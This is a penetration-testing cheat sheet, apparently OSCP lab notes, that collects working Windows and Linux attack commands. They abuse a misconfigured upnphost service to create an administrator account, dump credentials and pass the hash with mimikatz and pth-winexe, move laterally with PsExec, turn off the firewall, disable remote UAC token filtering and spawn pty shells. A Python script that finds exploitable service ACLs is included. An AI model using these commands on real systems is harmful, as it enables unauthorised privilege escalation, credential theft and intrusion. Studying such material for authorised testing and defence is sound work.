# keepnote

**File transfer:**

<https://blog.ropnop.com/transferring-files-from-kali-to-windows/>

**WinPrivCheck:**

<https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat>

**Local privilege escalation by abusing a misconfigured service (upnphost):**

First list the services whose configuration low-privileged users are allowed to change (`-w` restricts accesschk to write permissions; use `accesschk-xp.exe` on Windows XP):

```
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula
```

Inspect the candidate service, record its current configuration with `sc qc upnphost` so it can be restored afterwards, clear its dependencies and point `binpath` at the command you want run. The binary path is executed as the service account (LocalSystem for upnphost) when the service starts; `net.exe` is not a real service binary, so `sc start` reports a timeout error, but the command has already run by then. Each `binpath` change needs its own stop/start, otherwise the second `sc config` simply overwrites the first before it ever executes:

```
accesschk.exe -ucqv upnphost
sc config upnphost depend= ""
sc config upnphost binpath= "net user testxlab Password1 /add"
sc stop upnphost
sc start upnphost
sc config upnphost binpath= "net localgroup Administrators testxlab /add"
sc stop upnphost
sc start upnphost
```
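The same check accesschk performs above can be done by hand from `sc sdshow <service>` output, which prints the service's security descriptor in SDDL. The script below is an added example (not from the original note or from Sysinternals): it parses the DACL, decodes the service-specific rights and flags any allow ACE that gives a low-privileged principal (Authenticated Users, Users, Everyone, ...) the right to rewrite the service configuration, which is exactly what the `sc config ... binpath=` step above depends on. The three SDDL strings are constructed samples, not output from a real host.

```python
import re

# Two-letter SDDL right tokens as they appear in "sc sdshow" output for a service.
RIGHT_NAMES = {
    "CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus",
    "SW": "EnumDependents", "RP": "Start", "WP": "Stop",
    "DT": "PauseContinue", "LO": "Interrogate", "CR": "UserDefinedControl",
    "SD": "Delete", "RC": "ReadControl", "WD": "WriteDac", "WO": "WriteOwner",
    "GA": "GenericAll", "GW": "GenericWrite", "GR": "GenericRead",
    "GX": "GenericExecute", "FA": "FileAll",
}
# Some descriptors carry a raw hex mask instead of tokens; map the bits back.
MASK_BITS = {
    0x0001: "CC", 0x0002: "DC", 0x0004: "LC", 0x0008: "SW", 0x0010: "RP",
    0x0020: "WP", 0x0040: "DT", 0x0080: "LO", 0x0100: "CR", 0x10000: "SD",
    0x20000: "RC", 0x40000: "WD", 0x80000: "WO", 0x10000000: "GA",
    0x20000000: "GX", 0x40000000: "GW", 0x80000000: "GR",
}
# DC = SERVICE_CHANGE_CONFIG (rewrite binPath); WD/WO/GA/GW/FA let the
# principal grant itself that right anyway.
WRITE_RIGHTS = {"DC", "WD", "WO", "GA", "GW", "FA"}
START_RIGHTS = {"RP", "GA", "FA"}
STOP_RIGHTS = {"WP", "GA", "FA"}

# Principals every low-privileged logon is a member of (alias and raw SID forms).
LOW_PRIV_SIDS = {
    "AU": "Authenticated Users", "BU": "BUILTIN\\Users", "WD": "Everyone",
    "IU": "Interactive", "AN": "Anonymous", "DU": "Domain Users",
    "S-1-5-11": "Authenticated Users", "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-1-0": "Everyone",
}

ACE_RE = re.compile(r"\(([^)]*)\)")


def decode_rights(rights_str):
    """Turn 'CCDCLCSW...' or '0x1201bf' into a set of two-letter right tokens."""
    if rights_str.lower().startswith("0x"):
        mask = int(rights_str, 16)
        return {name for bit, name in MASK_BITS.items() if mask & bit}
    return {rights_str[i:i + 2] for i in range(0, len(rights_str), 2)}


def parse_dacl(sddl):
    """Return the DACL of an SDDL string as (ace_type, rights, sid) tuples.

    The 'D:' section ends at the SACL ('S:'), so audit ACEs are not included.
    """
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights_str, _obj, _inh, sid = fields[:6]
        aces.append((ace_type, decode_rights(rights_str), sid))
    return aces


def weak_service_aces(sddl):
    """Allow ACEs that give a low-privileged principal write access to the service."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        if ace_type != "A" or sid not in LOW_PRIV_SIDS:
            continue
        write = rights & WRITE_RIGHTS
        if not write:
            continue
        findings.append({
            "principal": LOW_PRIV_SIDS[sid],
            "write_rights": sorted(RIGHT_NAMES[r] for r in write),
            "can_start": bool(rights & START_RIGHTS),
            "can_stop": bool(rights & STOP_RIGHTS),
        })
    return findings


def is_exploitable(sddl):
    """True when a low-priv principal can rewrite the config *and* start the service.

    Stop rights matter only if the service is running (otherwise wait for a
    reboot of an auto-start service), so they are reported but not required.
    """
    return any(f["can_start"] for f in weak_service_aces(sddl))


# Constructed samples: a normal descriptor, one granting Authenticated Users
# change-config plus start/stop, and the same grant written as a hex mask.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")
HEX_SDDL = "D:(A;;0x1201bf;;;AU)"

if __name__ == "__main__":
    for name, sddl in [("default", DEFAULT_SDDL), ("weak", WEAK_SDDL), ("hex", HEX_SDDL)]:
        print(name, is_exploitable(sddl), weak_service_aces(sddl))
```

Run it against real output with `sc sdshow upnphost` copied into the string; a finding with `can_start` set but `can_stop` unset means the binPath rewrite works but the service has to be stopped some other way (or the box rebooted) before it runs.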

**File transfer via FTP**

Switch to binary mode before uploading executables, otherwise the transfer corrupts the file:

```
ftp> binary
ftp> put /root/Downloads/accesschk.exe accesschk.exe
```

For a WebDAV share, `cadaver` gives the same `put`/`get` workflow:

```
cadaver http://10.11.1.14/
```

**Python interactive shell (pty spawn)**

Upgrade a dumb reverse shell to a pty so interactive programs such as `su`, `sudo` and `ssh` work:

```
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Both firewall commands need an elevated (administrator) prompt.

**Disable Windows firewall on newer versions:**\
`NetSh Advfirewall set allprofiles state off`

**Disable Windows firewall on older Windows (XP/2003):**\
`netsh firewall set opmode disable`

**References**

priv esc linux - hackingarticles (abusing the PATH variable) <https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/> <https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/>

priv esc - cron jobs <https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/>

priv esc - windows - services - sc <https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/>

## PtH

`pth-winexe` takes the credential as `USER%LMHASH:NTHASH`; `aad3b435b51404eeaad3b435b51404ee` is the empty LM hash, so only the NT hash after the colon matters:

`pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe`

#### via Sysinternals tools and mimikatz

* **PtH: obtain the user's NTLM hash (via RDP, MSF or other), then inject it into a new process**

```
mimikatz# privilege::debug
mimikatz# sekurlsa::minidump FILE.DMP
mimikatz# sekurlsa::logonpasswords
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH} /run:cmd.exe
```

`sekurlsa::minidump` is only needed when the hashes are read from an lsass dump file instead of the live process; skip it otherwise. `sekurlsa::pth` starts a new cmd window (`/run:cmd.exe` is the default) whose network authentication uses the injected hash. From that window run commands on the target with PsExec:

`windows> PsExec.exe \\{IP} cmd`

Tip: general usage with a password:

`PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd`

If you get "Couldn't access otherComputer: Access is denied.":

UAC remote restrictions strip the administrator token from network logons of local (non-domain) admin accounts other than the built-in RID 500 Administrator, so the admin share PsExec needs is refused. Setting `LocalAccountTokenFilterPolicy` to 1 on the target disables that filtering. Running this requires administrative access on the target already (for example from an interactive session), so it is an enabler for later lateral movement, not a bypass:

`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`
